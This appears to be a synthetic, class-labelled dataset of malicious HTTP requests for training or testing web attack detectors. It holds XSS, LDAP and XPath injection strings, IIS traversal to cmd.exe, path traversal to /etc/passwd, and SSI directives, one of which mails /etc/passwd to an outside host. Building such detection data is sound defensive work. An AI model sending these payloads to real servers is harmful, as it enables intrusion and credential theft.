Transfer-Encoding: compress
Upgrade: awna1h/3.9, fneo/6.3, ayJ7mt/6.9
Warning: 143 221.24.90.70:6149 "atInyfjon" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 094897870
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49197
Start - Id: 46492
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.1
Host: 108.205.201.248:2
Connection: keep-alive
Accept: image/jpeg, audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: qrnl-hc9;q=0.6, mir-Iiru9t, 1-e
Cache-Control: no-transform
Client-ip: 219.134.80.54
Cookie: daYr5owIor=937466424;dQTfbde=88;icen=u5qBq;cbecx= 'sbtaC%u/ddhome2aiinscriptw;gi8=hd7eis6oddfnmro
Cookie2: $Version="5"
Date: Sat, 19 Aug 06 21:42:48 CET
ETag: "XgEaHknSpO0avcsEQ"
Expect: 5rctCi08
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Fri, 01 Aug 08 18:50:30 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Feb 07 09:32:05 UTC
Max-Forwards: 469
Pragma: no-cache
Proxy-Authorization: NTLM cnZJb2h4dWxrb0VENnBOMW9menRPT3NvaTdlc3J0aXd2ZUlvYnRuZXRlbw==
Authorization: NTLM ZWxlZEF5Z2hMcGVyb2VobGVlcnd1bmpVMm5kZThvYU5yZWVUcm5vZW53ZUhz
Range: 0-48
Referer: http://wclc2re.biz/cugaiuoi/3a75isas/elsi/iaTlv.jpeg
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: 7z86du4 http://www.cfit.de
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: 0.5 www.o9qe2l.htm, hfe9ia/0.7 www.skhsc7.js
Transfer-Encoding: gzip
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 000 30.27.133.227 "nEecyFef" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 46492
Start - Id: 37723
class: LdapInjection
POST /rjY2A8.-cr1y3ZX/fsrtmE8tnebutmaoaz/m99WKTF/jBu-7U5L1G5rqk5/xtPE@c-Qhtb/eMWo0d_IdrzivCH6mMFK.jpg? HTTP/1.0
Content-Length: 113
Content-Language: dGl4ty,dxzOpms6
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 09 Apr 07 01:01:44 GMT
Host: 81.230.179.135:80
Connection: ymbin
Accept: audio/basic, audio/x-wav
Accept-Charset: iso-8859-7
Accept-Encoding: *;q=0.0
Accept-Language: 3qpEOy-ahit;q=0.8, n-aycmhtNn;q=0.6, e-ii, dAvsdwWo-tmxnaohE, deicGynr-ur
Cache-Control: m1IT='iesrf'
Cookie2: $Version="851"
Date: Sun, 12 Jul 09 10:35:52 CET
Expect: 8mpesG7
If-Modified-Since: Wed, 08 Dec 04 01:45:10 UTC
If-Unmodified-Since: Fri, 03 Jun 05 17:23:58 UTC
If-Match: *
If-None-Match: "eS7uwhXzfnEMKQxMV8m"
Max-Forwards: 520
Authorization: Basic cnJpYjpuTTJnc0Jv
Referer: /neFifm/tefTa/npni/9ok6sv/iidirst.mdb
TE: trailers,trailers
User-Agent: szcBd- http://www.awSMeczh.ch
Via: FTP/5.1 137.160.212.178, FTP/2.2 www.a6taei3d.jpg
Transfer-Encoding: hEjcm; MeyrA=8sno
Upgrade: lnd/9.2, toL/2.4
----: ------------------------------------------------

OsREAWusrs7PFE=8wW&edctt='snetcatw&noszNlpuxelos1=5h)(&(objectClass=   t6o*)&9eRafsibrsjie6g=pCzk3q

End - Id: 37723
Start - Id: 39661
class: SSI
GET /jRfUgnxfy64sa.msf?heroa=iRllhl&dnhn=8&lpl=%3C%21--+++%23include+virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&9nW0mlu=878485250 HTTP/1.1
Host: 113.14.180.85
Connection: close
Accept: image/*;q=0.4, image/*;q=0.4, video/mpeg;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 48.57.34.71
Cookie: xopetx4ileralwv=jeEoaaracih;nodu=636
Cookie2: $Version="811"
Date: Wed, 29 Apr 09 23:04:05 CET
ETag: W/"DjzoEKQNI9ad3TMI8QLe"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Wed, 09 Feb 05 13:16:29 CET
If-Unmodified-Since: Mon, 17 Mar 08 14:02:26 UTC
If-Match: "B@3VoxY.xDKOy5mo"
If-None-Match: *
If-Range: Tue, 23 Sep 08 05:26:30 CET
Max-Forwards: 689
MIME-Version: 3.9
Pragma: a=yboSa
Proxy-Authorization: NTLM Mm41YzRyZ2VsbDdzbWxhdHRyeXRzbm1jaHNtc245aXQ=
Authorization: Basic YnRlczpuc29lcGNlMg==
Range: -7190
Referer: http://smsE.st/tese/aipn/nai5.msf
TE: chunked;q=0.2
Trailer: Date
User-Agent: yaeandEe
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8969x195
Via: uii/7.4 95.143.107.144:4593
Transfer-Encoding: gzip
Upgrade: iw6k/3.2, ans3Du/7.4, m5dr/5.3
Warning: 273 www.Sneje.htm "srzSNAitebchch" "Mon, 20 Dec 04 23:29:19 UTC"
X-Forwarded-For: 50.214.174.78
X-Serial-Number: 659531112
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39661
Start - Id: 44302
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.OeatHsneba.de:80
Connection: redhT
Accept: */*;q=0.3
Accept-Charset: macintosh;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 18.62.79.179
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="583"
Date: Sat, 15 May 04 17:26:16 UTC
ETag: "z-wEaS4pP5@ex2B"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Mon, 26 Jul 04 09:17:10 CET
If-Unmodified-Since: Sun, 06 Feb 05 20:30:58 GMT
If-Match: "8Qzcs0Ith50ujetsKzuz"
If-None-Match: *
If-Range: Thu, 08 Jun 06 05:24:57 UTC
Max-Forwards: 1
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: Basic QXZuUmhjcnU6YWc2bmExaA==
Range: 3-
Referer: http://eCnuu.com/7ndika/nknt/tksetxs8/atieNpn/eae8ei3I.php4
TE: deflate,chunked,trailers
Trailer: Expect
User-Agent: Mozilla/4.6 (X11; U; SunOS sun4u 0.8; nh-mH; rv:1.3.7) Gecko/61285333
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 521x0746
Via: 1.3 www.wttans.png:729
Transfer-Encoding: gzip
Upgrade: ott9i/7.1, tei/4.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44302
Start - Id: 49640
class: XPathInjection
GET /wqeJrLnVzb/shqowie4svaaRelea5ka/tgmhahnaastgnuCt/iQPrcp@-L2G_K/styleChA/eBmX_passthru5Hb/abEs.4y_oVUoLlrTCV.jpeg?HreomtL2oer=Ne2h8oh%27++++or+1%3C+++++o9Xgsz%2FcahE%2FhdHuj%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D2%5D+++++or++%27t0tk%27++++%3D%27&tRtLenbol=%5Cha3pl%3F0hhstyleft%3AasHza&isb2n7onnh=f HTTP/1.1
Host: www.ajfe3as.com:836
Connection: oelw3r7
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Language: T-niN;q=0.2, enfftrr-mp
Cache-Control: no-cache
Client-ip: 181.220.88.111
Date: Wed, 07 Jun 06 19:56:17 UTC
If-Modified-Since: Mon, 10 Jul 06 02:16:17 UTC
If-Unmodified-Since: Thu, 15 Oct 09 02:06:27 CET
If-Match: "9iZ4Tt51hxPE3a9Jr"
If-Range: Sat, 28 Oct 06 16:29:57 CET
Max-Forwards: 9419
MIME-Version: 8.5
Pragma: ayAjdtua=e5fd
Referer: http://www.fitsfs.st/crcOs/ht8rr/eanet.jpeg
TE: trailers,gzip;q=0.6
User-Agent: feDisnrcrd/8.7.9.4
Via: hTtti/7.8 245.21.9.86:48328
Transfer-Encoding: gzip
Upgrade: d5det/1.1
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 460757969488

null

End - Id: 49640
Start - Id: 37146
class: LdapInjection
GET /Nndpnhaoisru0aep.cgi?ttks9osala=0G_i51EP%40F&8stbaS=5gaenv&Ne=075786&2ete23rvg=koaa%3Atdng0aiNdelete&WpGxhome2R@v7uy=3W%29%28%26%28objectClass+++%3D++nx*%29&edt2damd=nMa&tusras=tumw%29%5Bfti&lrdc=Shd%3Cl HTTP/1.1
Host: 248.11.188.73:80
Connection: utrm
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: rc-rTa, hewn-e;q=0.5, ey-irx;q=0.3
Cache-Control: only-if-cached
Client-ip: 186.207.13.158
Cookie: bnnooocfn=rr;fksi=slappt gdk;snraqheedAGcBra=t@emsopenftoio
Cookie2: $Version="12"
Date: Mon, 23 Nov 09 17:42:39 CET
ETag: W/"RxU5d45Z4IV2969"
Expect: 100-continue
From: tiriuma2@nheraeb.net
If-Modified-Since: Wed, 12 May 04 16:36:10 UTC
If-Unmodified-Since: Fri, 01 Aug 08 04:43:17 UTC
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: "fvICtzELXv1aqfuA"
If-Range: Wed, 13 Jun 07 10:00:49 GMT
Max-Forwards: 993
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: tRyn7 ltusgv4=ec82A
Range: 88347-,9-
Referer: /aet9/sntmw/aeHbti/raytnd/hlaim.nsf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.5 (Windows; U; Win98 9.8; sn-gi; rv:0.0.5) Gecko/45697684
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: FTP/8.5 146.234.207.178
Transfer-Encoding: identity
Upgrade: 39se/0.8, sEeahl/6.8, 4chs1h/1.6, l5INot/1.9, a0kxka/1.4
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 248.38.25.114
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37146
Start - Id: 46493
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.1
Host: www.igaaEli.st:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-greek, gb2312, iso-8859-9;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 219.134.80.54
Cookie: at4a=93;0-esystem-vkincludeC=239;h3uneiOrir=H-%
Cookie2: $Version="5"
Date: Sun, 31 Oct 04 19:38:20 GMT
ETag: "XgEaHknSpO0avcsEQ"
Expect: 5rctCi08
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Wed, 13 Jun 07 03:47:29 CET
If-Match: *
If-None-Match: "W5fHifN204xHZvD_Cooi"
If-Range: "-j9OI@AIkxXhBo86PRq"
Max-Forwards: 469
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM ZWxlZEF5Z2hMcGVyb2VobGVlcnd1bmpVMm5kZThvYU5yZWVUcm5vZW53ZUhz
Range: 0-48
Referer: http://76esnoic.st/adcerya/Fyjfg.exe
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.6 (Machintosh; U; PPC Mac OS X 7.8; lh-ne; rv:3.9.0) Gecko/08721548
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: 0.5 www.o9qe2l.htm, hfe9ia/0.7 www.skhsc7.js
Transfer-Encoding: otsn; troe=con6a
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 000 30.27.133.227 "nEecyFef" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 46493
Start - Id: 39968
class: SSI
GET /a1iuBo9XtKYd33U@.css?ortu=crmSnntoukrep&bZRM2EX=%3C%21--++++%23exec++cmd%3D%22%2Fbin%2Fmail+++++ivreo.com+%3C+++++%2Fetc%2Fpasswd%22--%3E HTTP/1.0
Host: 111.82.140.47
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 183.52.12.49
Cookie: xcWst1i=stodo8cd3n(s+2 an&;h5secnuuem=e 5sock_stream@eveuo$;5tooeesi=89;1Ou2NtnrhVm=zae1i4HeeasOso1mS;iulmu1oed=9ca4lobr;g01trhr7giE=aki0h
Cookie2: $Version="03"
Date: Fri, 16 Jan 09 13:59:29 UTC
ETag: W/"AZnigfVHFs0zM56rr"
Expect: AItosemo=ysen
From: qaol9@aa3eqiae.fr
If-Modified-Since: Thu, 23 Jul 09 20:11:20 GMT
If-Unmodified-Since: Fri, 05 Jun 09 24:30:08 UTC
If-Match: *
If-None-Match: *
If-Range: "YavZqkjOeTOFp6nQ"
Max-Forwards: 657
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Basic ZHJpdGpwdm86aXFmZWZj
Range: 67904-931063
Referer: http://eAtet.org/ami9/jhsstIaa/enene/se3ua.png
TE: trailers,chunked,chunked;q=0.3
Trailer: Date
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 7.1; an-ea; rv:7.4.3) Gecko/15953048
UA-CPU: Sparc
UA-OS: Win9x
UA-Color: color16
Via: FTP/1.9 www.djIlhie.html
Transfer-Encoding: identity
Upgrade: snt/4.7, 9diah/5.8, zl6/2.7
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39968
Start - Id: 39025
class: LdapInjection
POST /1s2Twslajnytcce/lqsywplore5ifesrmra/Diawnnttie/Xx9xf-TTVAO/nw/qlom.htm? HTTP/1.1
Content-Length: 220
Content-Language: 5oeeb,otr,sc
Content-Encoding: deflate
Content-Location: /tenede/rcdo1x3.php3
Content-MD5: emVuY2RzMmVDZmRhb2hibw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 Mar 07 22:55:08 GMT
Last-Modified: Wed, 06 Oct 04 20:32:43 CET
Host: 188.3.110.219
Connection: keep-alive
Accept: application/rtf;q=0.6, image/png, image/*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, deflate;q=0.4, identity, identity, deflate
Accept-Language: *;q=0.8
Cache-Control: max-stale=1
Client-ip: 42.170.193.199
Cookie: 2shhnfdhcE=tstokt
Cookie2: $Version="35"
Date: Mon, 03 Apr 06 21:34:59 UTC
ETag: "iLW@6vsQxq499o6Y"
Expect: 100-continue
From: atitro@THsros.uk
If-Modified-Since: Mon, 22 Nov 04 18:32:06 UTC
If-Unmodified-Since: Wed, 16 Jan 08 03:34:15 CET
If-Match: "mXd59_-pehX3HAJ3"
If-None-Match: *
If-Range: Tue, 08 Dec 09 10:54:36 GMT
Max-Forwards: 2890
Pragma: no-cache
Authorization: Digest realm
Referer: /Idieeae/hepiyhoc/sk8a.wmn
TE: trailers,trailers,gzip;q=0.1
User-Agent: 0434)(&(objectClass=hdul)(|(sn=  ru)(cn=ee J*))
UA-Color: color32
UA-Pixels: 7332x461
Via: 5.6 181.42.245.15:17
Transfer-Encoding: deflate
Upgrade: aoese/7.7, il7/0.0, iNtwe/2.8, ofsd/5.6, naOq/0.5
Warning: 398 213.104.228.158:7764 "ashaeZn" "Sat, 21 Feb 04 03:14:09 CET"
X-Forwarded-For: 84.228.185.10
X-Serial-Number: 6446333
----: -----------------
~~~~~: ~~~~~~~~~~~

yIauercm=3&-cSvbscript4eB%uB=9317&tuseorme=da2hs49ltdcesiy&cx1penoIl=39489&fsa=icR&NcqD=90945&ism.OZF=a%3A4a&oeUf4l=tYbcJ7MV&P_q7window.openPwRorLr=2&YeiframeA2AdjexecKUj=lZ2SnFN4&awnc2zan=4260667785&4naa6rwsieeA=6487407

End - Id: 39025
Start - Id: 37772
class: LdapInjection
GET /inareplaceonUaccept.dll?nsinRpfrade=w+n&objectxy-g9J6K=eNl9&ugdztrMssraths=3&DorgdsxisgsMdin=%29%28++%7C%28ww%3Digoa*%29 HTTP/1.1
Host: 105.109.76.174
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 3.137.158.163
Cookie: cadmerd=nrub;trEirsa=145;lp=f gpt$e;gfstt=2722297;ovetn=77254;ft=55891
Cookie2: $Version="189"
Date: Fri, 10 Aug 07 18:46:59 CET
ETag: "K8JclCYhB4_YHqlv"
Expect: vaQg=itklittE
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Fri, 06 Feb 04 24:54:57 GMT
If-Unmodified-Since: Fri, 05 Dec 08 18:31:22 UTC
If-Match: "7_mk2jJhNLBLRmDE__Lg"
If-None-Match: *
If-Range: Sun, 20 Jun 04 07:58:20 GMT
Max-Forwards: 6208
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic ZTdhYWNjdDpldWR3aG1lNQ==
Authorization: Basic bmVyNTpyaVZh
Range: 00-,840-774
Referer: /iflr/tiet/Beboge.tiff
TE: deflate,trailers
Trailer: TE
User-Agent: Mozilla/9.1 (X11; U; Unix 5.4; yS-n5; rv:5.1.2) Gecko/09159083
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 807x162
Via: FTP/9.5 www.ks5tO2iI.htm, snw/2.2 www.irsoei.jpeg, bx14/8.5 91.144.94.248
Transfer-Encoding: deflate
Upgrade: t7io2/1.6, sfa/5.8, eN2D/9.7, uer/0.1, ete/2.8
Warning: 938 145.133.83.75 "ehdr1rgj" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37772
Start - Id: 44372
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: 255.88.167.174
Connection: b8phsrek
Accept: */*
Accept-Charset: x-mac-icelandic, iso-8859-8-i, x-mac-icelandic;q=0.0, us-ascii;q=0.6
Accept-Encoding: gzip;q=0.5, compress, gzip, compress;q=0.3, identity
Accept-Language: h-ue8sfq;q=0.8, 7e-5tsIeo;q=0.9
Cache-Control: max-age=5
Client-ip: 190.213.40.169
Cookie: meilfiiue6grl=291561649;dSgroup byo3hLaccess_logYdl9=492260;BfRVO@.81R=cOdROL;e6hi8QtdupoNdh=en64tRN;tgmnssnaauDust=4;okobe=8saHacEeyhph~bn
Cookie2: $Version="5"
Date: Wed, 24 Nov 04 04:12:56 CET
ETag: W/"o4@mSRlI7dOqkgmEd"
Expect: p4ymocrd
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Thu, 07 Dec 06 16:09:40 GMT
If-Unmodified-Since: Sat, 01 Dec 07 03:58:54 GMT
If-Match: "5gRCiYfPue.f_e2"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: NTLM b2xlcHdha2VhZGNvZGV5b2lvaWRzUTl0UDJtcG93cnU2bTA=
Authorization: Digest qop=auth
Range: -592489
Referer: http://www.ineiOO.uk/nmmGso/4ctE/endb/nnhiEere/t5lee.nsf
TE: trailers,chunked,trailers
Trailer: Cache-Control
User-Agent: e.7L1A3 http://www.rolrq.st
UA-CPU: x86
UA-Disp: 0327,603,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 347x4806
Via: 7.9 250.47.236.46, 7.8 81.98.182.25:8733
Transfer-Encoding: deflate
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44372
Start - Id: 44116
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 76.236.202.110:80
Connection: imth0
Accept: text/*;q=0.0, video/quicktime, audio/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=4251
Client-ip: 249.225.32.40
Cookie: ieArhRi1dxew=7Iem;ensa3oqTphy=aevalmt;0neRnNAea;otpaTewcoradsni=6prfttnsts)iwgincluden3e;ftdacuuacn=d;zb5j;erMdebQpr5tlRsr=422201547
Cookie2: $Version="15"
Date: Sun, 03 Aug 08 05:34:47 CET
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Wed, 31 Jan 07 20:22:15 GMT
If-Unmodified-Since: Sun, 09 Apr 06 21:55:04 GMT
If-Match: "w8jIW-yi4JTTJv17."
If-None-Match: *
If-Range: Sat, 14 Apr 07 01:02:35 GMT
Max-Forwards: 4
MIME-Version: 5.1
Pragma: n='welFm'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: NTLM Y3RzYnN2Y2VubG4xZTBjZG56ZW91aWxlV3RhbnlycGZldA==
Range: 57267-9066
Referer: /hhse/nt9ferl.jpg
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: srgoi0em (gOlC11; z0uixyO; h7EOZ7s; ouJoU--7gy)
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: compress
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 038 www.Iwehs8.jpg "pwentl6I1attqrfteiY" "Sat, 05 Jan 08 22:01:37 UTC"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44116
Start - Id: 46074
class: PathTransversal
PUT /sj8eOyliqW1_/tgieovn/Simgw6lCzUAK4/jeZDv-iuI3/KkU_cVUi.png? HTTP/1.0
Content-Length: 286
Content-Language: 4nstr,ar
Content-Encoding: compress
Content-Location: http://www.eotcoe.be/n2Si3sog.cgi
Content-MD5: YWRkZmxxZWFlcG50Y2NOYQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 04 Jul 06 22:10:31 GMT
Host: www.Oile.org
Connection: lha38us
Accept: audio/x-wav;q=0.8
Accept-Encoding: compress, deflate;q=0.9, deflate;q=0.2, gzip
Accept-Language: *
Cookie2: $Version="592"
Date: Mon, 22 Jan 07 12:56:56 CET
Expect: adrwsd6=eYskhrq
If-Modified-Since: Tue, 28 Apr 09 19:11:46 GMT
Authorization: NTLM YW9zZHRldG5yRWlhaG8ybDZlcGhjd295cnNlb2V0aHVhdFJlMg==
Referer: http://www.sbwnus.org/i4rh4/nos9l/nMt6/leiedts7.pl
TE: trailers,trailers
User-Agent: Mozilla/5.9 (compatible; Konqueror/8.6; Mac OS X; 69ho; nistfenLn)
Via: HTTP/1.4 www.ypwtcb.htm
Transfer-Encoding: identity

cya=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html&jphpSeX@76wW=94773676&1rohsoetaat=latne4snmrmp0tUetx&e3iasu=9304309&o2awb8t5utrxtc=afserS&vocfdllTo=hoho&et3=a4copyx

End - Id: 46074
Start - Id: 38651
class: LdapInjection
GET /oH_hlRwGK4m/aeIosre95oEraison/k18.@uFX/9sghfae7goahvat0ed/TByVrcp.tperl/egCxM/abaiVgTVG/sWQvLv5DccmOrBd4e9/u@nxVQ-@0.Fcj4iU/wzTEANXSJ88pBrUzST/istss9fsehoejvUv.msf?iosasaofe=189258&bodyW6HhpnlhxrI=teu&@-I4Yf=troTo%29%28+%7C%28aey%3D*%29&ekao=77755191 HTTP/1.1
Host: 100.56.185.191
Connection: wnQeee
Accept: text/*
Accept-Charset: iso-8859-7, x-mac-japanese;q=0.1
Accept-Encoding: gzip;q=0.5, deflate;q=0.3, identity;q=0.8, compress;q=0.3, compress;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 48.249.181.128
Cookie: 4pee=a.vF6.l;za4dnhnqcyesto=9126;ynO9no=mo1smnti4am4tbe;6e92D1vdocument8n=i9WwZB9x_hi
Cookie2: $Version="2"
Date: Tue, 11 May 04 03:04:48 CET
ETag: "eyDCB5QN-Yd1FZKT8r1y"
Expect: wof9
From: t4byed8@l9nss.fr
If-Modified-Since: Wed, 15 Apr 09 05:53:13 CET
If-Unmodified-Since: Tue, 08 Jul 08 15:53:27 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM aXllb3RQdGZmZXl0cEpsazlrc2VzZXNodGV1bG1nQWRv
Authorization: NTLM ZWkyb2lrbmVBbGVnbjFxQWV0Ym43eXllZXd1dGFydHRpdm5ibGtwZmVjb2VtZQ==
Range: 25834-,48-325537
Referer: http://www.sNsta.ch/uOoeya/xryedrdw/recgNlro/eImisi.doc
TE: chunked;q=0.7,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/3.3 (X11; U; Linux i386 8.6; cs-iN; rv:1.0.5) Gecko/05284238
UA-CPU: PowerPC
UA-Disp: 397,637,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 774x1723
Via: peuieu/8.3 www.TpbtwcEw.htm, que9/6.4 www.3iebfi.js, HTTP/0.7 199.12.125.154
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 923 31.36.82.245:31824 "1y3pAs" "Sun, 03 Oct 04 18:11:26 UTC"
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 15901278083
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38651
Start - Id: 44028
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 195.99.143.109
Connection: loOtnnai
Accept: application/*, application/rtf, video/mpeg;q=0.2
Accept-Charset: cp-936, euc-jp;q=0.5, iso-8859-7, x-mac-arabic
Accept-Encoding: *;q=0.7
Accept-Language: 9sausu-hxzR, a-y;q=0.0, jn-4Jd
Cache-Control: only-if-cached
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="698"
Date: Thu, 06 May 04 02:58:02 UTC
ETag: "Ulw7dIb1rT0S2qp-n1I"
Expect: oOei72
From: t8ara@rpmnyne.de
If-Modified-Since: Tue, 03 Oct 06 01:18:37 UTC
If-Unmodified-Since: Sun, 30 Mar 08 04:11:40 UTC
If-Match: "oq7CIXRnKI_tzfx@"
If-None-Match: "7eJph@gTW85_4iJH"
If-Range: Sun, 28 Feb 10 21:17:34 GMT
Max-Forwards: 7369
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: HwhbDt aamej=aueqawo
Authorization: Basic dGh0Y25hYTo4dGlvU3o=
Range: 67-764741,470518-20,3-202913
Referer: /ms7sW7ao/mqtoiR.pl
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Accept
User-Agent: Mozilla/6.7 (Machintosh; U; PPC 7.1; nd-XE; rv:2.6.0) Gecko/08412763
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4697x9146
Via: HTTP/3.6 0.222.205.78, 4.6 www.RsLe.gif:7524, HTTP/0.7 5.68.185.127
Transfer-Encoding: gzip
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 433 www.lisatk.htm "tl3Nr" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44028
Start - Id: 37458
class: LdapInjection
GET /eK-HnCHZUsl/dle/q2SCJZu6q/eoenfstn/kjn9/9g0QxfpxM.jJDtqQS0/detVn.js?bqydiosn=1&zcbtroonir1jbt=tmpOntt&sRezi8=854&ntnnm=e7&0tgTf=1013 HTTP/1.0
Host: 69.34.5.3
Connection: close
Accept: video/*;q=0.9
Accept-Charset: euc-jp, iso-8859-4;q=0.7, x-mac-ce, x-mac-korean;q=0.7
